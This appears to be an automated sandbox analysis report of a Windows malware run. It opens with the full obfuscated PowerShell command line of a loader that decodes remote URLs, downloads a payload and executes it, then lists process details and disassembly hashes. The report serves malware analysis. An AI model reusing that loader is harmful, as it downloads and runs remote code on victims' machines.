                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;"
                                                                            Imagebase:0x7ff760310000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:8
                                                                            Start time:04:39:29
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff70f010000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            General

                                                                            Target ID:9
                                                                            Start time:04:39:30
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\cmd.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t"
                                                                            Imagebase:0x7ff76f730000
                                                                            File size:289'792 bytes
                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 00007FF887CE2062 Relevance: 1.7, Strings: 1, Instructions: 493COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1741352968.00007FF887CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ce0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: !1
                                                                              • API String ID: 0-2411635949
                                                                              • Opcode ID: 053083d04bbdd07d700fb66cb8a15fa3831249190821122dad8168f9a6d7dadd
                                                                              • Instruction ID: 2560865cbc3d02af9a7f19a60315c31e24ac0d608a784dd05773311acef2716b
                                                                              • Opcode Fuzzy Hash: 053083d04bbdd07d700fb66cb8a15fa3831249190821122dad8168f9a6d7dadd
                                                                              • Instruction Fuzzy Hash: 36E1B222E4DEC64FE75A9738D8653B87BF2FF56650B0801FAC089C7193DA18A885C742
                                                                              Function 00007FF887CE4BEA Relevance: .4, Instructions: 444COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1741352968.00007FF887CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ce0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 734089d07e9b83725ae4df230ef5b335cae379645c58ae711403d297a4ec6773
                                                                              • Instruction ID: 8fb35afe5fe664bd1f1466d8bf7f7fdd52b0466fa738bcd6d787c9a630f3e413
                                                                              • Opcode Fuzzy Hash: 734089d07e9b83725ae4df230ef5b335cae379645c58ae711403d297a4ec6773
                                                                              • Instruction Fuzzy Hash: CCD11732D4DAC94FE7969B68D8555BDBBB2FF46390B0801FAE04DCB0D3DA18A945C341
                                                                              Function 00007FF887C13C28 Relevance: .2, Instructions: 154COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1740817274.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887c10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c20c8c0212487278e9fbc56ab131ae70fdd7ceaa9ee049ad7104d1576b8332c7
                                                                              • Instruction ID: d728199217136fefb4ea305994069cbc93f40ae3b34e70399c217d4756582545
                                                                              • Opcode Fuzzy Hash: c20c8c0212487278e9fbc56ab131ae70fdd7ceaa9ee049ad7104d1576b8332c7
                                                                              • Instruction Fuzzy Hash: B1418462A4D7C24FE3129768D8664E93FB0FF532A471901F7D4C9CB0A3D619944AC7A2
                                                                              Function 00007FF887CE21C4 Relevance: .1, Instructions: 99COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1741352968.00007FF887CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887ce0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 66092cb5e0597aeaa8e6f828e66d4b7da0680eb3974fff248ca1671aa39e1448
                                                                              • Instruction ID: 217719c4f596e1693a74553af50497f8f0bcccfeb14a659ff35bc330989f8e68
                                                                              • Opcode Fuzzy Hash: 66092cb5e0597aeaa8e6f828e66d4b7da0680eb3974fff248ca1671aa39e1448
                                                                              • Instruction Fuzzy Hash: 42210623E4DE8A4FE7A99728D85537C62E3FF403A0B5800B9C10DC7193EE1DAC85C201
                                                                              Function 00007FF887C13BB5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1740817274.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7ff887c10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                              • Instruction ID: 84aa7a10332e796551db3198be58e9eb60ec6782d344aa7b19cf8dd9829e57be
                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                              • Instruction Fuzzy Hash: F301677115CB0C4FDB54EF0CE451AA9B7E0FB99364F10056DE58AC3651D636E882CB46

                                                                              Executed Functions

                                                                              Function 00007FF887CE313A Relevance: .4, Instructions: 420COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1556015104.00007FF887CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ff887ce0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a4453c64a8bde2898ae1e304ab743e53ccab31b99f64064678c7be10ee33843d
                                                                              • Instruction ID: cc34a0c513499905cb257865368f59e37dc361ec592fc171ed0a487fb39361b1
                                                                              • Opcode Fuzzy Hash: a4453c64a8bde2898ae1e304ab743e53ccab31b99f64064678c7be10ee33843d
                                                                              • Instruction Fuzzy Hash: B6D1F132E4DA8A4FE795DB68C8156BDBBB2FF55390B1801BED44CC7093DA18B805C342
                                                                              Function 00007FF887CE3170 Relevance: .3, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1556015104.00007FF887CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ff887ce0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 83470ff8746a5ca032c002b98b41803e0d46ff063e52d6d1cd387429460a07ac
                                                                              • Instruction ID: a534341b5ace634e14c98d40872340db7da72f57a7feeeb8cefa42955b7c9dcd
                                                                              • Opcode Fuzzy Hash: 83470ff8746a5ca032c002b98b41803e0d46ff063e52d6d1cd387429460a07ac
                                                                              • Instruction Fuzzy Hash: C481AE22E4EAC64FE7A69A68C85567CBBB2FF41690B5900FEC44CCB1D3DD19B805C342
                                                                              Function 00007FF887C13428 Relevance: .1, Instructions: 58COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1555721549.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ff887c10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f49575ece1a7afa8cbf9876ed080f064e8c16419039b70717f74ae63d484c74d
                                                                              • Instruction ID: d1e4cb77952be8828e941fee2106f1c8cdecb855535052e945873b436e1ee93d
                                                                              • Opcode Fuzzy Hash: f49575ece1a7afa8cbf9876ed080f064e8c16419039b70717f74ae63d484c74d
                                                                              • Instruction Fuzzy Hash: 7911D67150C7854FE746DB2CA8625947FF0EF53230B0842AFD0C9C70A3D625A847C796
                                                                              Function 00007FF887C133B5 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1555721549.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ff887c10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                              • Instruction ID: 8d8d75c02915983bda0ed6384bb377800861eddaa4620fd0c3e0b9bd24d05fc1
                                                                              • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                              • Instruction Fuzzy Hash: 0701677115CB0C4FDB44EF0CE451AA9B7E0FB99364F50056EE58AC3651DA36E882CB46

                                                                              Non-executed Functions

                                                                              Function 00007FF887C106B0 Relevance: 5.0, Strings: 4, Instructions: 48COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.1555721549.00007FF887C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C10000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_7ff887c10000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (0e$8,e$P/e$-e
                                                                              • API String ID: 0-1082030431
                                                                              • Opcode ID: 5dec7beef16fb947d94758e35261546f34287175fc70be6d0aa5754b1531f7cf
                                                                              • Instruction ID: 9c693b1d0e6fed981e739d9d25ae00419a265055d31109a02f7b9604e5e23351
                                                                              • Opcode Fuzzy Hash: 5dec7beef16fb947d94758e35261546f34287175fc70be6d0aa5754b1531f7cf
                                                                              • Instruction Fuzzy Hash: 12015E62ECEAC54FE34689B8381A03EAEB2BB8295070840FFD05C870DBD44589D9C392

                                                                              Executed Functions

                                                                              Function 00007FF887BE5AF5 Relevance: 1.9, Strings: 1, Instructions: 678COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2759429791.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887be0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 6H
                                                                              • API String ID: 0-346772970
                                                                              • Opcode ID: aa5ff530e15ade2f9433c309170815b4967a631ccce1798b0ce96a2f188dc47b
                                                                              • Instruction ID: 234e1ac550020abc8df1f8a371965ffc321df0ae1daa3fd5e498e457581add3c
                                                                              • Opcode Fuzzy Hash: aa5ff530e15ade2f9433c309170815b4967a631ccce1798b0ce96a2f188dc47b
                                                                              • Instruction Fuzzy Hash: 5922D131A0CA498FEB89DF6CD895AA97BF2FF59350F1441BAD04DC7296CA24E841C781
                                                                              Function 00007FF887CB6663 Relevance: .4, Instructions: 427COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2760249832.00007FF887CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887cb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 771337570dd53b85c3463a3fc9d5b25c8592da15c240122d9ab07e83427a5682
                                                                              • Instruction ID: bdadc105c0b3406595aa6af927f9ea66e2357991db98bec8e563be2a0ef151d5
                                                                              • Opcode Fuzzy Hash: 771337570dd53b85c3463a3fc9d5b25c8592da15c240122d9ab07e83427a5682
                                                                              • Instruction Fuzzy Hash: C3D12632D4CA8A8FEB94DB28D8552BC77F2FF56750F1801BAE10DE7192DE28A904C741
                                                                              Function 00007FF887CB925B Relevance: .4, Instructions: 386COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2760249832.00007FF887CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887cb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f61f860afd9ee4ffb809ec86c9377dc28d42ef3970c35d6053edc69002a132ce
                                                                              • Instruction ID: bba6fd7190f25e25b7856150743a77dd85cb074b681b27dd24ab9bf849fc3353
                                                                              • Opcode Fuzzy Hash: f61f860afd9ee4ffb809ec86c9377dc28d42ef3970c35d6053edc69002a132ce
                                                                              • Instruction Fuzzy Hash: 66C12331D4DA8A8FE7D5AB68C8556BD7BB2FF65390F1801BAE10CC70C3DA18A905C742
                                                                              Function 00007FF887CB67A7 Relevance: .2, Instructions: 156COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2760249832.00007FF887CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887cb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a5e4e5f11901fc7a611e03c8e07c545f1c2344c8a0eece7e1c5cf2e81fe33f86
                                                                              • Instruction ID: 7a9d1711a51c805739fcff03a47812345ecfb98b2b57f18d6218b2ec5b68012d
                                                                              • Opcode Fuzzy Hash: a5e4e5f11901fc7a611e03c8e07c545f1c2344c8a0eece7e1c5cf2e81fe33f86
                                                                              • Instruction Fuzzy Hash: A3510622D8DAC68FE7959B28D8652BC66F2FF56790F5800B9E10CE71D3DE1DA904C702
                                                                              Function 00007FF887CB6A1B Relevance: .1, Instructions: 138COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2760249832.00007FF887CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CB0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887cb0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e238a7a36a9099a4d22c86aa114cba859f85c30475d4a156958926e212cc8345
                                                                              • Instruction ID: e3c6dea5e3adb1ef4a84a4c9104f369cd835de4bd1fea6183bc2540cc7910916
                                                                              • Opcode Fuzzy Hash: e238a7a36a9099a4d22c86aa114cba859f85c30475d4a156958926e212cc8345
                                                                              • Instruction Fuzzy Hash: 2D41EDA284EBC95FD7139B7888252657FB1EF53248F1901EBD099DB0E3EA0C591AC352
                                                                              Function 00007FF887BE3535 Relevance: .0, Instructions: 49COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2759429791.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887be0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction ID: e1b0bfc01a6250ee4234029e6575cbecd4b8e1c2553c3d91fdfe5ee1d6473dc3
                                                                              • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                              • Instruction Fuzzy Hash: 2A01677115CB0C4FDB48EF0CE451AA9B7E0FB99364F10056DE58AC3651DA36E881CB46

                                                                              Non-executed Functions

                                                                              Function 00007FF887BE0800 Relevance: 8.9, Strings: 7, Instructions: 103COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2759429791.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887be0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: (0e$8,e$H1e$P/e$p0e$-e$/e
                                                                              • API String ID: 0-2586823915
                                                                              • Opcode ID: 5796f8ec847ec2a56fb6f25fada19626f72ff4becbe0193802d0689c0e0362ca
                                                                              • Instruction ID: c07fcae05ddfe7c3aa67e587eec15b763002ad44d13a9c2f3870ca5e526d7912
                                                                              • Opcode Fuzzy Hash: 5796f8ec847ec2a56fb6f25fada19626f72ff4becbe0193802d0689c0e0362ca
                                                                              • Instruction Fuzzy Hash: 0E316423D8E9C14FE35649B4281923A6EB2FF52B90B6840FFC09C872DBE454995DD381
                                                                              Function 00007FF887BE03C8 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.2759429791.00007FF887BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BE0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_7ff887be0000_powershell.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: @Je$]$p@y$x.e
                                                                              • API String ID: 0-4158309294
